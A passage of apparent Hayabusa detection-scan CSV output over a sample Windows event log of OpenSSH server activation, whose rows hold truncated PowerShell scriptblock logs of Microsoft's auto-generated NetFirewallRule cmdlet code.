(@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 
'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${Associ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 
2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"atedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' -Alias '*' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 